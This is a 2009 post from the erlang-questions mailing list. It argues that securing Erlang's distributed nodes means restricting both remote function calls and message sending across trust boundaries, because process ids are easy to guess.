[erlang-questions] A less trusting Erlang.
Mon Oct 12 21:16:07 CEST 2009
The problem I am seeing with this is that it is not sufficient to just
prevent a remote node from running an apply() or calling certain
functions, you also have to prevent it from sending messages to places
you care about. What happens to your system if my node connects and
then starts spraying exit signals around? This is the hard part. In
theory a pid() should be a relatively safe unguessable number, in
practice it is trivial to guess and there are built-in facilities to
make this task even easier. There are at least two parts to making
Erlang "internally secure": restricting function calls across trust
boundaries (as you have noted) and restricting message sending across
these same boundaries. There are probably other components necessary
for this task, but those two jump right out as hard problems to solve.
More information about the erlang-questions